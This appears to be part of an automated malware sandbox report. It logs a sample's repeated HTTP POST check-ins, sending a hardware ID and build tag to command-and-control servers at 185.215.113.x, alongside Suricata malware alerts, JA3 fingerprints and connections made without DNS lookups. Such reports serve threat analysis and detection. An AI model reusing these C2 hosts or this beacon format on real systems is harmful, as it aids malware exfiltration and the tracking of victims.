Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDHCFCBGIDGHJJKJJDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------HJDHCFCBGIDGHJJKJJDGContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------HJDHCFCBGIDGHJJKJJDGContent-Disposition: form-data; name="build"stok------HJDHCFCBGIDGHJJKJJDG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49787 -> 104.21.51.88:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49793 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49794 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49800 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49813 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49812 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49842 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49841 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49848 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49854 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49862 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49863 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49855 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49880 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49881 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49896 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49907 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49923 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49938 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49921 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49983 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50001 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50000 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50002 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50018 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50026 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50033 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50043 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50049 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50017 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50065 -> 104.21.51.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50094 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50113 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50077 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50283 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50284 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50322 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50295 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50288 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50318 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50299 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50316 -> 104.21.50.161:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50297 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50320 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50302 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50279 -> 104.21.50.161:443

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.101
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.101
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.101
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.101
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.101
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.101
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006BE0C0 recv,recv,recv,recv,

0_2_006BE0C0

